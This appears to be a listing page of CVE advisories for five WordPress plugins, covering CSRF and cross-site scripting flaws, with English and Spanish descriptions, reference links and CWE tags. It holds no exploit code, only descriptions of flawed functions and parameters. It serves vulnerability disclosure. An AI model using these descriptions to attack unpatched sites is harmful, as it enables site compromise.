CVE-2022-44737 – WordPress All In One WP Security plugin <= 5.1.0 - Multiple Cross-Site Request Forgery (CSRF) vulnerabilities
https://notcve.org/view.php?id=CVE-2022-44737
Multiple Cross-Site Request Forgery vulnerabilities in All-In-One Security (AIOS) – Security and Firewall (WordPress plugin) <= 5.1.0 on WordPress. Múltiples vulnerabilidades de Cross-Site Request Forgery en el complemento All-In-One Security (AIOS) Security and Firewall en WordPress en versiones <= 5.1.0. The All In One WP Security & Firewall plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 5.1.0. This is due to incorrect nonce validation on the functions 'render_login_whitelist', 'render_rename_login', 'render_honeypot' functions and possible others. This makes it possible for unauthenticated attackers to perform bulk actions on the plugin's list tables (such as deleting blocked IP entries) via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. • https://patchstack.com/database/vulnerability/all-in-one-wp-security-and-firewall/wordpress-all-in-one-wp-security-plugin-5-1-0-multiple-cross-site-request-forgery-csrf-vulnerabilities?_s_id=cve • CWE-352: Cross-Site Request Forgery (CSRF) •
CVE-2022-3822 – Donations via PayPal < 1.9.9 - Admin+ Stored XSS
https://notcve.org/view.php?id=CVE-2022-3822
The Donations via PayPal WordPress plugin before 1.9.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). El complemento Donations via PayPal de WordPress anterior a 1.9.9 no sanitiza ni escapa a algunas de sus configuraciones, lo que podría permitir a usuarios con privilegios elevados, como el administrador, realizar ataques de Cross-Site Scripting (XSS) Almacenado incluso cuando la capacidad unfiltered_html no está permitida (por ejemplo, en configuración multisitio). The Donations via PayPal plugin for WordPress is vulnerable to Stored Cross-Site Scripting when saving settings in versions up to, and including, 1.9.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. • https://wpscan.com/vulnerability/48ec2e4a-0190-4f36-afd1-d5799ba28c13 • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •
CVE-2022-2189 – WP Video Lightbox < 1.9.5 - Reflected Cross-Site Scripting
https://notcve.org/view.php?id=CVE-2022-2189
The WP Video Lightbox WordPress plugin before 1.9.5 does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute, which could lead to Reflected Cross-Site Scripting in old web browsers El plugin WP Video Lightbox de WordPress versiones anteriores a 1.9.5, no escapa del parámetro $_SERVER["REQUEST_URI"] antes de devolverlo en un atributo, lo que podría conllevar a un ataque de tipo Cross-Site Scripting Reflejado en navegadores antiguos The WP Video Lightbox plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the $_SERVER['REQUEST_URI'] parameter in versions up to, and including, 1.9.4 due to insufficient input sanitization and output escaping. This makes it possible for administrative attackers to inject arbitrary web scripts in pages that execute when someone visits an injected page. • https://wpscan.com/vulnerability/b6ed4d64-ee98-41bd-a97a-8350c2a8a546 • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •
CVE-2022-2194 – Accept Stripe Payments < 2.0.64 - Admin+ Stored Cross-Site Scripting
https://notcve.org/view.php?id=CVE-2022-2194
The Accept Stripe Payments WordPress plugin before 2.0.64 does not sanitize and escape some of its settings, allowing high privilege users such as admin to perform cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. El plugin Accept Stripe Payments de WordPress versiones anteriores a 2.0.64, no sanea y escapa de algunas de sus configuraciones, permitiendo a usuarios con altos privilegios como el administrador llevar a cabo ataques de tipo Cross-Site Scripting incluso cuando la capacidad unfiltered_html está deshabilitada • https://wpscan.com/vulnerability/ecf4b707-dea9-42d0-9ade-d788a9f97190 • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •
CVE-2022-1695 – WP Simple Adsense Insertion < 2.1 - Inject ads and javascript via CSRF
https://notcve.org/view.php?id=CVE-2022-1695
The WP Simple Adsense Insertion WordPress plugin before 2.1 does not perform CSRF checks on updates to its admin page, allowing an attacker to trick a logged in user to manipulate ads and inject arbitrary javascript via submitting a form. El plugin WP Simple Adsense Insertion de WordPress versiones anteriores a 2.1, no lleva a cabo comprobaciones de tipo CSRF en las actualizaciones de su página de administración, lo que permite a un atacante engañar a un usuario con sesión iniciada para manipular anuncios e inyectar javascript arbitrario por medio del envío de un formulario • https://wpscan.com/vulnerability/2ac5b87b-1390-41ce-af6e-c50e5709baaa • CWE-352: Cross-Site Request Forgery (CSRF) •